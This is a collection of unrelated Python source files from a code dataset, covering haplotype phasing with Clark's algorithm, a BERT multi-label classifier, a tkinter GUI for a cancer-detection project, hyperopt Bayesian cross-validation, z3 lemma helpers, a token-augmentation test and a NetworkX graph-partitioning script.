guess_rest(data,haplotypes)\n\t#print(\"# of -1 before guess =\", np.count_nonzero(final_haplotypes==-1))\n\n\treturn final_haplotypes\n\n# Divides up data into blocks and runs Clark's algorithm one block at at time.\nif __name__ == \"__main__\":\n\tdata = load('../data/test data/test_data_1.txt')\n\n\tnum_snps = len(data)\n\tnum_indivs = len(data[0])\n\n\t# Hyperparameters for splitting up the dataset\n\t# TODO: Optimize and choose best values\n\tblock_size = 180\n\twindow_len = 30\n\n\thaplotypes = []\n\n\tif len(data) % block_size == 0:\n\t\tnum_blocks = (int)(len(data)/block_size)\n\telse:\n\t\tnum_blocks = (int)(len(data)/block_size) + 1\n\t#print((int)(len(data)/block_size) + math.ceil((num_snps % block_size) / block_size)\n\n\tprint(\"********** Clark's Algorithm **********\")\n\tprint(\"# of SNP sites =\", num_snps)\n\tprint(\"# of Individuals =\", num_indivs)\n\tprint(\"Block Size =\", block_size)\n\tprint(\"Window Length =\", window_len)\n\tprint(\"# of Blocks =\", num_blocks,\"\\n\")\n\tprint(\"Starting...\")\n\t\n\tbar = Bar('Progress Bar', max=num_blocks,suffix = '%(percent).1f%% - %(eta)ds')\n\tfor i in range(num_blocks):\n\t\t#print(\"Working on block #{} out of {}\".format(i+1, num_blocks))\n\t\tdata_block = data[i*block_size:i*block_size+block_size]\n\t\tif i == 0:\n\t\t\thaplotypes_block = clarks(data_block,window_len)\n\t\t\thaplotypes = haplotypes_block\n\t\telif i == num_blocks-1 and len(data[i*block_size:]) > 0:\n\t\t\tfinal_data_block = data[i*block_size:]\n\t\t\tfinal_num_snps = len(final_data_block)\n\t\t\tfinal_num_indiv = len(final_data_block[0])\n\t\t\tfinal_haplotypes_block = np.zeros((final_num_snps,2*final_num_indiv),dtype=np.int)\n\t\t\tfinal_haplotypes_block.fill(-1)\n\t\t\tfinal_haplotypes_block = guess_rest(final_data_block, final_haplotypes_block)\n\t\t\thaplotypes = np.concatenate((haplotypes,final_haplotypes_block),axis=0)\n\t\telse:\n\t\t\thaplotypes_block = clarks(data_block,window_len)\n\t\t\thaplotypes = np.concatenate((haplotypes,haplotypes_block),axis=0)\n\t\tbar.next()\n\tbar.finish()\n\tprint(\"********** Clark's Algorithm **********\")\n\n\t#print(\"Final haps row, col = {} {}\".format(len(haplotypes), len(haplotypes[0])))\n\tnp.savetxt('../data/test data/test_data_1_my_sol.txt', haplotypes, fmt='%i', delimiter = ' ')\n\n\n\t\n\n\n\n\n\n\n\n\n\n\n\t","repo_name":"danielpark95/haplotype-phasing","sub_path":"src/clarks.py","file_name":"clarks.py","file_ext":"py","file_size_in_byte":8990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74112317608","text":"from transformers import BertPreTrainedModel, BertModel, AlbertPreTrainedModel, AlbertModel, RobertaModel\nfrom transformers import AlbertConfig, BertConfig, PretrainedConfig, RobertaConfig, AutoConfig\n\nfrom torch import nn\nfrom torch.nn import BCEWithLogitsLoss\nfrom collections import OrderedDict\n\n\nclass BertForMultiLabelClassification(BertPreTrainedModel):\n \"\"\"\n 参考 transformer BertForSequenceClassification 3.0.2\n 主要修改点:损失函数\n \"\"\"\n\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, config.num_labels)\n\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n labels=None,\n output_attentions=None,\n output_hidden_states=None,\n ):\n r\"\"\"\n labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):\n Labels for computing the sequence classification/regression loss.\n Indices should be in :obj:`[0, ..., config.num_labels - 1]`.\n If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),\n If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).\n\n Returns:\n :obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration\n (:class:`~transformers.BertConfig`) and inputs:\n loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, returned when :obj:`label` is provided):\n Classification (or regression if config.num_labels==1) loss.\n logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, config.num_labels)`):\n Classification (or regression if config.num_labels==1) scores (before SoftMax).\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned\n when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or\n when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n outputs = self.bert(\n input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n )\n\n pooled_output = outputs[1]\n\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n\n outputs = (logits,) + outputs[2:] # add hidden states and attention if they are here\n\n if labels is not None:\n loss_fct = BCEWithLogitsLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1, self.num_labels))\n outputs = (loss,) + outputs\n\n return outputs # (loss), logits, (hidden_states), (attentions)\n\n\nMODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING = OrderedDict(\n [\n (BertConfig, BertForMultiLabelClassification)\n ]\n)\n\nclass AutoModelForMultiLabelClassification:\n \"\"\"\n 参考 transformer AutoModelForSequenceClassification 3.0.2, 目前只实现了 Albert Bert Roberta\n 主要修改 MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING 配置\n \"\"\"\n\n def __init__(self):\n raise EnvironmentError(\n \"AutoModelForSequenceClassification is designed to be instantiated \"\n \"using the `AutoModelForSequenceClassification.from_pretrained(\"\n \"pretrained_model_name_or_path)` or \"\n \"`AutoModelForSequenceClassification.from_config(config)` methods.\"\n )\n\n @classmethod\n def from_config(cls, config):\n r\"\"\" Instantiates one of the base model classes of the library\n from a configuration.\n\n Note:\n Loading a model from its configuration file does **not** load the model weights.\n It only affects the model's configuration. Use :func:`~transformers.AutoModel.from_pretrained`\n to load the model weights\n\n Args:\n config (:class:`~transformers.PretrainedConfig`):\n The model class to instantiate is selected based on the configuration class:\n\n - isInstance of `distilbert` configuration class: :class:\n `~transformers.DistilBertForSequenceClassification` (DistilBERT model)\n - isInstance of `albert` configuration class: :class:`\n ~transformers.AlbertForSequenceClassification` (ALBERT model)\n - isInstance of `camembert` configuration class: :class:\n `~transformers.CamembertForSequenceClassification` (CamemBERT model)\n - isInstance of `xlm roberta` configuration class: :class:\n `~transformers.XLMRobertaForSequenceClassification` (XLM-RoBERTa model)\n - isInstance of `roberta` configuration class: :class:\n `~transformers.RobertaForSequenceClassification` (RoBERTa model)\n - isInstance of `bert` configuration class: :class:\n `~transformers.BertForSequenceClassification` (Bert model)\n - isInstance of `xlnet` configuration class: :class:\n `~transformers.XLNetForSequenceClassification` (XLNet model)\n - isInstance of `xlm` configuration class: :class:\n `~transformers.XLMForSequenceClassification` (XLM model)\n - isInstance of `flaubert` configuration class: :class:\n `~transformers.FlaubertForSequenceClassification` (Flaubert model)\n\n\n Examples::\n # Download configuration from S3 and cache.\n config = BertConfig.from_pretrained('bert-base-uncased')\n\n # E.g. model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelForSequenceClassification.from_config(config)\n \"\"\"\n for config_class, model_class in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.items():\n if isinstance(config, config_class):\n return model_class(config)\n raise ValueError(\n \"Unrecognized configuration class {} for this kind of AutoModel: {}.\\n\"\n \"Model type should be one of {}.\".format(\n config.__class__,\n cls.__name__,\n \", \".join(c.__name__ for c in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys()),\n )\n )\n\n # 模型路径和模型配置\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the sequence classification model classes of the library\n from a pre-trained model configuration.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n based on the `model_type` property of the config object, or when it's missing,\n falling back to using pattern matching on the `pretrained_model_name_or_path` string:\n\n - `distilbert`: :class:`~transformers.DistilBertForSequenceClassification` (DistilBERT model)\n - `albert`: :class:`~transformers.AlbertForSequenceClassification` (ALBERT model)\n - `camembert`: :class:`~transformers.CamembertForSequenceClassification` (CamemBERT model)\n - `xlm-roberta`: :class:`~transformers.XLMRobertaForSequenceClassification` (XLM-RoBERTa model)\n - `roberta`: :class:`~transformers.RobertaForSequenceClassification` (RoBERTa model)\n - `bert`: :class:`~transformers.BertForSequenceClassification` (Bert model)\n - `xlnet`: :class:`~transformers.XLNetForSequenceClassification` (XLNet model)\n - `flaubert`: :class:`~transformers.FlaubertForSequenceClassification` (Flaubert model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Args:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download,\n e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3,\n e.g.: ``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :\n func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (\n e.g. `./tf_model/model.ckpt.index`). In this case, ``from_tf`` should be set to True\n and a configuration object should be provided as ``config`` argument. This loading path\n is slower than converting the TensorFlow checkpoint in a PyTorch model using the\n provided conversion scripts and loading the PyTorch model afterwards.\n\n model_args: (`optional`) Sequence of positional arguments:\n All remaining positional arguments will be passed to the underlying model's ``__init__`` method\n\n config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n Configuration for the model to use instead of an automatically loaded configuation.\n Configuration can be automatically loaded when:\n\n - the model is a model provided by the library (loaded with the ``shortcut-name`\n ` string of a pretrained model), or\n - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and\n is reloaded by suppling the save directory.\n - the model is loaded by suppling a local directory as ``pretrained_model_name_or_path``\n and a configuration JSON file named `config.json` is found in the directory.\n\n state_dict: (`optional`) dict:\n an optional state dictionary for the model to use instead of a state dictionary\n loaded from saved weights file. This option can be used if you want to create a model\n from a pretrained configuration but load your own weights. In this case though,\n you should check if using :func:`~transformers.PreTrainedModel.save_pretrained`\n and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n cache_dir: (`optional`) string:\n Path to a directory in which a downloaded pre-trained model\n configuration should be cached if the standard cache should not be used.\n\n force_download: (`optional`) boolean, default False:\n Force to (re-)download the model weights and configuration files and override the cached versions if they exists.\n\n resume_download: (`optional`) boolean, default False:\n Do not delete incompletely recieved file. Attempt to resume the download if such a file exists.\n\n proxies: (`optional`) dict, default None:\n A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n The proxies are used on each request.\n\n output_loading_info: (`optional`) boolean:\n Set to ``True`` to also return a dictionary containing missing keys, unexpected keys and error messages.\n\n kwargs: (`optional`) Remaining dictionary of keyword arguments:\n These arguments will be passed to the configuration and the model.\n\n Examples::\n # Download model and configuration from S3 and cache.\n model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased')\n # E.g. model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModelForSequenceClassification.from_pretrained('./test/bert_model/')\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModelForSequenceClassification.from_pretrained(\n './tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n config = kwargs.pop(\"config\", None)\n if not isinstance(config, PretrainedConfig):\n config = AutoConfig.from_pretrained(pretrained_model_name_or_path, **kwargs)\n\n for config_class, model_class in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.items():\n if isinstance(config, config_class):\n return model_class.from_pretrained(pretrained_model_name_or_path, *model_args, config=config, **kwargs)\n raise ValueError(\n \"Unrecognized configuration class {} for this kind of AutoModel: {}.\\n\"\n \"Model type should be one of {}.\".format(\n config.__class__,\n cls.__name__,\n \", \".join(c.__name__ for c in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys()),\n )\n )\n","repo_name":"liguodongiot/nlp-app-samples","sub_path":"tests/iter_version_dev/V1_0_0/automodel_multilabel.py","file_name":"automodel_multilabel.py","file_ext":"py","file_size_in_byte":14326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29044033503","text":"from ctypes.wintypes import SIZE\nfrom tkinter import *\nfrom tkinter import END,filedialog\n \nfrom PIL import ImageTk, Image\nimport pre_cancer_detect as pre\nimport tkinter as tk\n\n\n# Create object \nroot = Tk()\n \n# Adjust size \nroot.geometry(\"590x350\")\n\n\nnew_pic = ImageTk.PhotoImage(Image.open(\"dna-background.jpg\").resize((2000, 1000), Image.ANTIALIAS))\nimg =Image.open('dna-background.jpg')\nbg = ImageTk.PhotoImage(img)\n# Create Canvas\ncanvas1 = Canvas( root, width = 400,\n height = 600)\n \ncanvas1.pack(fill = \"both\", expand = True)\n \n# Display image\ncanvas1.create_image( 0, 0, image=new_pic,\n anchor = \"nw\")\n \n\nroot.state('zoomed')\n\n\n\nlabel_file_explorer =tk.Label(canvas1,\n text = \"File Explorer using Tkinter\",\n font=20,\n width=50,\n height=1,\n fg = \"blue\")\n\ndef browseFiles():\n global p\n filename = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = ((\"Text files\",\n \"*.txt*\"),\n (\"all files\",\n \"*.*\")))\n label_file_explorer.configure(text=\"File Opened: \"+filename)\n p=filename\n \n\nbutton_explore =tk.Button(canvas1,\n width=50,\n height=1,\n text = \"Browse Files \",\n font=50,\n command=browseFiles\n \n )\n \n\n\n\ndef draw():\n \n train,test,error=pre.cancer(p)\n\n train_score=tk.Label(canvas1,text=\"Train Score: \",font=30)\n train_score.place(x=550,y=170)\n\n\n text_box=tk.Entry(canvas1,width=50)\n text_box.insert(END,train)\n text_box.place(x=710,y=175)\n \n \n test_score=tk.Label(canvas1,text=\"Test Score: \",font=30)\n test_score.place(x=550,y=220)\n\n text_box1=tk.Entry(canvas1,width=50)\n text_box1.insert(END,test)\n text_box1.place(x=710,y=225)\n \n \n\n\n error_score=tk.Label(canvas1,text=\"error Score: \",font=30)\n error_score.place(x=550,y=270)\n error_box2=tk.Entry(canvas1,width=50)\n error_box2.insert(END,error)\n error_box2.place(x=710,y=275)\n\n\nbutton=tk.Button(canvas1,\n text=\"Cleaning\",\n font=50,\n width=50,\n height=1,\n bg=\"white\",\n fg=\"black\",\n command=draw\n)\ndef cont():\n root.destroy()\n import detection\n\n\ncon=tk.Button(canvas1,\n text=\"continue\",\n font=50,\n width=50,\n height=1,\n bg=\"white\",\n fg=\"black\",\n command=cont\n)\ncon.place(x=490,y=390)\n\nbutton_explore.pack(side=TOP, padx=0, pady=60)\nlabel_file_explorer.place(x=490,y=120)\nbutton.place(x=490,y=320)\n\n# Execute tkinter\n\nroot.mainloop()","repo_name":"ManarElSayed0/Detection-of-Pre-Cancer-Cells","sub_path":"pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43012590224","text":"from hyperopt import fmin, tpe, hp, Trials, rand\nfrom hyperopt import STATUS_OK\nfrom sklearn.model_selection import cross_val_score\nimport numpy as np\nfrom copy import deepcopy\nfrom ..plottingTool.mltools_plot import cross_validation_plot\n\n\nclass BayesianCV():\n '''\n Bayesian optimization is a probabilistic model based approach for finding the minimum of\n any function that returns a real-value metric.\n\n Args:\n -----\n model: >>> List of model to be tested\n kf: >>> Number of fold\n search_space: >>> File *.txt that contains params' distributions\n task: >>> Flag for 'classification' or 'regression' problem\n n_iter: >>> Optional. Number of iterations of optimization. Default 100.\n plot_loss: >>> Optional. If True plot the comparison between Tpe and Random algorithm. Default False.\n\n\n Return:\n self\n\n '''\n\n def __init__(self, model, kf, search_space, scoring, task,\n n_iter=100, n_jobs=1, plot_loss=False):\n\n self.model = model\n self.kf = kf\n self.search_space = search_space\n self.scoring = scoring\n\n if task == 'regression' or task == 'classification':\n self.task = task\n else:\n raise Exception(\"Error: invalid task. Use 'classification' or 'regression'.\")\n\n self.n_iter = n_iter\n self.train_set = None\n self.target_variable = None\n self.n_jobs = n_jobs\n self.plot_loss = plot_loss\n\n def _model_eval(self, hyperparameters, model):\n ''' This function set the hyperparameters to the model and execute cross-validation.\n Return score (mean) results.'''\n model_to_fit = model.set_params(**hyperparameters)\n scoring = 'neg_mean_squared_error' if self.scoring == 'residual_mean_squared_error' else self.scoring\n\n cv_results = cross_val_score(model_to_fit, self.train_set, self.target_variable,\n cv=self.kf, scoring=scoring)\n\n if self.scoring == 'residual_mean_squared_error':\n score = np.sqrt(-cv_results).mean()\n\n else:\n score = cv_results.mean()\n\n return score\n\n def _objective(self, hyperparameters):\n \"\"\"Objective function for Gradient Boosting Machine\n Hyperparameter Optimization\"\"\"\n\n # Keep track of evals\n global ITERATION\n global PROGRESS\n global min_loss_list\n\n model = deepcopy(self.model)\n ITERATION += 1\n\n best_score = self._model_eval(hyperparameters, model)\n if self.task == 'classification':\n loss = 1 - best_score\n else:\n loss = best_score\n\n min_loss_list.append(loss)\n # Display progress\n if ITERATION % PROGRESS == 0:\n print('Iteration: {}, Score: {}.'.format(ITERATION, (round(min(min_loss_list), 4))))\n min_loss_list = []\n\n # Dictionary with information for evaluation\n return {'iteration': ITERATION,\n 'loss': loss,\n 'hyperparameters': hyperparameters,\n 'status': STATUS_OK}\n\n def fit(self, train_set, target_variable):\n self.train_set = train_set\n self.target_variable = target_variable\n\n # This istance save all results of all iteration\n tpe_trials = Trials()\n\n global ITERATION\n ITERATION = 0\n\n global min_loss_list\n min_loss_list = []\n\n global PROGRESS\n PROGRESS = int((self.n_iter) / 10)\n\n best = fmin(fn=self._objective, space=self.search_space,\n algo=tpe.suggest, max_evals=self.n_iter,\n trials=tpe_trials, rstate=np.random.RandomState(50))\n\n tpe_results = tpe_trials.best_trial['result']\n\n self.best_estimator_ = self.model.set_params(**tpe_results['hyperparameters'])\n self.results_ = tpe_trials.results\n\n if self.task == 'classification':\n self.best_score_ = 1 - tpe_results['loss']\n else:\n self.best_score_ = tpe_results['loss']\n\n if self.plot_loss:\n\n rand_trials = Trials()\n ITERATION = 0\n\n best = fmin(fn=self._objective, space=self.search_space,\n algo=rand.suggest, max_evals=self.n_iter,\n trials=rand_trials, rstate=np.random.RandomState(50))\n\n iterations = [x['iteration'] for x in tpe_trials.results]\n loss = [x['loss'] for x in tpe_trials.results]\n\n cross_validation_plot.plotting_iter_res(iterations, loss, title='Tpe Sequence of Values')\n\n iterations = [x['iteration'] for x in rand_trials.results]\n loss = [x['loss'] for x in rand_trials.results]\n\n cross_validation_plot.plotting_iter_res(iterations, loss, title='Random Sequence of Values')\n\n return self\n","repo_name":"Tostox/mltools","sub_path":"mltools/evaluateModels/bayesian_optimization.py","file_name":"bayesian_optimization.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"21067747762","text":"import z3\n\ndef lemma_to_string(lemma, pred):\n \"\"\"\n convert a lemma returned by get_cover_delta into a string that parse_smt2_string can parse\n \"\"\"\n const_list = [z3.Const(pred.name()+\"_\"+str(j), pred.domain(j)) for j in range(pred.arity())]\n lhs = pred(*const_list)\n rhs = z3.substitute_vars(lemma, *(const_list))\n imp = z3.Implies(lhs, rhs)\n forall = z3.ForAll(list(reversed(const_list)), imp)\n lemma_str = \"(assert %s)\"%forall.sexpr()\n print(\"\\toriginal lemma:\", lemma)\n print(\"\\tforall lemma:\", forall.body().arg(1))\n assert lemma == forall.body().arg(1)\n return lemma_str\n\ndef stripQuantifierBlock (expr) :\n \"\"\" strips the outermost quantifier block in a given expression and returns\n the pair (,\n )\n\n Example:\n\n assume expr.is_forall ()\n vars, body = strip_quantifier (expr)\n qexpr = z3.ForAll (vars, body)\n assert qexpr.eq (expr)\n \"\"\"\n if not z3.is_quantifier (expr) : return ([], expr)\n consts = list ()\n # outside-in order of variables; z3 numbers variables inside-out but\n # substitutes outside-in\n for i in reversed (range (expr.num_vars ())) :\n v_name = expr.var_name (i)\n v_sort = expr.var_sort (i)\n consts.append (z3.Const (v_name, v_sort))\n matrix = z3.substitute_vars (expr.body (), *consts)\n return (consts, matrix)\n\n\n","repo_name":"nhamlv-55/deepSpacer","sub_path":"metaspacer/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13753242397","text":"from transformers.augment_tokens import AugmentTokens\nimport pytest\n\n\n@pytest.mark.parametrize(\n [\"original_tokens\", \"return_previous\", \"expected\"],\n [\n ([\"europa\", \"asia\", \"america\"], \"next\", [\"asia\", \"america\", \"

    \"]),\n ([\"europa\", \"asia\", \"america\"], \"prev\", [\"

    \", \"europa\", \"asia\"]),\n ([\"europa\"], \"prev\", [\"

    \"]),\n ([], \"prev\", []),\n ],\n)\ndef test_augment_tokens_slice_sequence(original_tokens, return_previous, expected):\n start_token = \"

    \"\n end_token = \"

    \"\n\n augment_tokens = AugmentTokens(\n start_tokens=start_token, end_tokens=end_token, which=return_previous\n )\n\n actual = augment_tokens.slice_sequence(original_tokens)\n\n assert actual == expected\n","repo_name":"thatcsharpguy/vuelax-crf-on-aws","sub_path":"tests/unit/transformers/test_augment_tokens.py","file_name":"test_augment_tokens.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74214623847","text":"import matplotlib.pyplot as plt\r\n\r\nimport networkx as nx\r\nimport numpy as np\r\nfrom numpy.linalg import norm\r\nfrom sklearn.preprocessing import normalize\r\nfrom sklearn.cluster import KMeans\r\nfrom handler import Handler\r\nimport collections\r\nimport queue\r\nimport operator\r\nimport sys\r\n\r\n\r\npartitionSize = 7\r\n# G = nx.read_graphml(\"graphHML/Osmnx_large_trips_graph_75000.graphml\")\r\n# data = 'trips'\r\nG = nx.read_edgelist('file/edgeTestPickme/edgeList.txt',nodetype=int, data=(('weight',float),))\r\ndata = 'weight'\r\nprint(len(G.nodes()))\r\nweight_size = G.size(weight='weight')\r\nprint(weight_size)\r\nedgeWeight= 0\r\nfor (u,v,d) in G.edges(data=True):\r\n edgeWeight += abs(d[data])\r\nprint(edgeWeight)\r\n\r\nwith open(\"test_5.txt\") as f:\r\n datas = f.read()\r\n# print(data.split(']')[0])\r\npartitionArray = []\r\nfor k in range(0, 238):\r\n partition_data = datas.split('\\n')[k].replace('{','').replace('}', '').split(', ')\r\n\r\n tempartition = []\r\n for i in partition_data:\r\n tempartition.append(int(i))\r\n\r\n partitionArray.append(tempartition)\r\n\r\nadjecencyMatrix,edgecut = Handler.conectivityMatrix(partitionArray,G,data)\r\n# sort the partition array\r\nsorter = []\r\nfor e in partitionArray:\r\n sorter.append(len(e))\r\nsorter = np.asarray(sorter)\r\nidSorter = sorter.argsort()[::-1][:]\r\ntempPartitionArray = np.asarray(partitionArray)\r\ntempPartitionArray = tempPartitionArray[idSorter]\r\npartitionArray = []\r\nfor a in tempPartitionArray:\r\n partitionArray.append(a)\r\ntempPartitionArray = partitionArray.copy()\r\n\r\ndict = dict()\r\nfor i in range(0,partitionSize):\r\n dict[i] = 0\r\nupperbound = int(edgeWeight/(partitionSize+1))\r\nprint(edgecut,upperbound)\r\ncondition = True\r\nwhile(condition):\r\n #define partition array\r\n partitionArray = tempPartitionArray.copy()\r\n #zero the dic values\r\n for i in range(0, partitionSize):\r\n dict[i] = 0\r\n # choose the partition to merge begin\r\n part = []\r\n indexer = []\r\n for i in range(0, partitionSize):\r\n p = []\r\n if i == 0:\r\n part.append(p)\r\n id = Handler.partitionRandom(partitionArray, indexer)\r\n part[i].append(partitionArray[id])\r\n del partitionArray[id]\r\n else:\r\n indexer = []\r\n for z in range(0, len(partitionArray)):\r\n id = Handler.partitionRandom(partitionArray, indexer)\r\n indexer.append(id)\r\n if (Handler.edgeConectivity(G, part, partitionArray[id],data) == 0):\r\n part.append(p)\r\n part[i].append(partitionArray[id])\r\n del partitionArray[id]\r\n break\r\n tempPartitionSize = 0\r\n while (len(partitionArray) != 0):\r\n cont = 0\r\n for k in partitionArray:\r\n max, id = 0, -1\r\n #dictionary upper bound\r\n dicUpper = 0\r\n for v in range(0, partitionSize):\r\n dicUpper += dict[v]\r\n\r\n dicUpper = dicUpper / partitionSize\r\n for r in range(0, len(part)):\r\n edgeconectivity = Handler.interPartitionConectivity(G, part[r], k,data)\r\n if (edgeconectivity > max) & (dicUpper > dict[r]):\r\n dicUpper = dict[r]\r\n id = r\r\n max = edgeconectivity\r\n if (id == -1):\r\n for r in range(0, len(part)):\r\n edgeconectivity = Handler.interPartitionConectivity(G, part[r], k,data)\r\n if (edgeconectivity > max):\r\n id = r\r\n max = edgeconectivity\r\n if (id != -1):\r\n part[id].append(k)\r\n partTemp = []\r\n for par in part[id]:\r\n for p in par:\r\n partTemp.append(p)\r\n H = G.subgraph(partTemp)\r\n edgeWeight = 0\r\n for (u, v, d) in H.edges(data=True):\r\n edgeWeight += abs(d[data])\r\n dict[id] = edgeWeight\r\n del partitionArray[cont]\r\n cont += 1\r\n\r\n if (len(partitionArray) == tempPartitionSize):\r\n break\r\n tempPartitionSize = len(partitionArray)\r\n\r\n # edgecut is in define threshold\r\n print(len(partitionArray))\r\n if(len(partitionArray)==32):\r\n print(partitionArray)\r\n dicUpper = 0\r\n for v in range(0, partitionSize):\r\n dicUpper += dict[v]\r\n print(dict[v])\r\n\r\n dicUpper = dicUpper/partitionSize\r\n conditionCount = 0\r\n for r in range(0, partitionSize):\r\n if (dicUpper - dicUpper * 0.3 <= dict[r] <= dicUpper + dicUpper * 0.3):\r\n conditionCount += 1\r\n if (conditionCount == partitionSize):\r\n edgeWeight = 0\r\n for z in partitionArray:\r\n h = G.subgraph(z)\r\n for (u, v, d) in h.edges(data=True):\r\n edgeWeight += abs(d[data])\r\n print(edgeWeight)\r\n condition = False\r\n break\r\n\"\"\"\r\npart = []\r\ndegreeMatrix = Handler.degreeMatrix(G,partitionArray)\r\nadjecencyMatrix,edgecut = Handler.conectivityMatrix(partitionArray,G)\r\nprint(adjecencyMatrix)\r\nlaplacian = np.subtract(degreeMatrix,adjecencyMatrix)\r\neigenvalues, eigenvectors = np.linalg.eig(laplacian)\r\n\r\ntempEigenValues = eigenvalues\r\n\r\nidx = tempEigenValues.argsort()[:1][::]\r\neigenValues = tempEigenValues[idx]\r\neigenVectors = eigenvectors[:, idx]\r\nkmeans = KMeans(n_clusters=3, random_state=0).fit(eigenVectors)\r\npart = []\r\nw=0\r\np1, p2,p3 = [], [],[]\r\nfor p in kmeans.labels_:\r\n if (p == 0):\r\n p1.append(partitionArray[w])\r\n elif(p==1):\r\n p2.append(partitionArray[w])\r\n else:\r\n p3.append(partitionArray[w])\r\n w += 1\r\npart.append(p1)\r\npart.append(p2)\r\npart.append(p3)\r\n\r\n\"\"\"\r\n'''\r\nmatrix,edgecut1 = Handler.conectivityMatrix(partitionArray,G)\r\nedgecut2 = 0\r\nput,edgeConectivity = Handler.conectivityMatrix(partitionArray,G)\r\nalpha = Handler.alphaCut(matrix,0)\r\npartitionCount = 1\r\npart =[]\r\nnp.set_printoptions(threshold=np.nan)\r\nindexer = []\r\np1 = []\r\np2 = []\r\np3 = []\r\n#part.append(partitionArray)\r\n#partitioning in to two array\r\nmax , id = 0,0\r\nfor i in range(0,len(partitionArray)):\r\n if len(partitionArray[i])>max:\r\n max = len(partitionArray[i])\r\n id = i\r\npartition = partitionArray[id]\r\np1.append(partition)\r\ndel partitionArray[id]\r\n\r\nmax, id = 0, 0\r\nfor i in range(0, len(partitionArray)):\r\n if len(partitionArray[i]) > max:\r\n max = len(partitionArray[i])\r\n id = i\r\npartition = partitionArray[id]\r\np2.append(partition)\r\ndel partitionArray[id]\r\n\r\nmax, id = 0, 0\r\nfor i in range(0, len(partitionArray)):\r\n if len(partitionArray[i]) > max:\r\n max = len(partitionArray[i])\r\n id = i\r\npartition = partitionArray[id]\r\np3.append(partition)\r\ndel partitionArray[id]\r\ncond = False\r\nwhile(len(partitionArray)!=0):\r\n counter = 0\r\n for r in range(len(partitionArray)-1,-1,-1):\r\n if (Handler.edgeConectivity(G,p1,partitionArray[r])+Handler.edgeConectivity(G,p2,partitionArray[r])+Handler.edgeConectivity(G,p3,partitionArray[r]))==0:\r\n print(\"continue\",len(partitionArray),counter)\r\n if(r==0)&(counter==len(partitionArray)-1):\r\n print(partitionArray)\r\n cond = True\r\n break\r\n counter+=1\r\n continue\r\n if 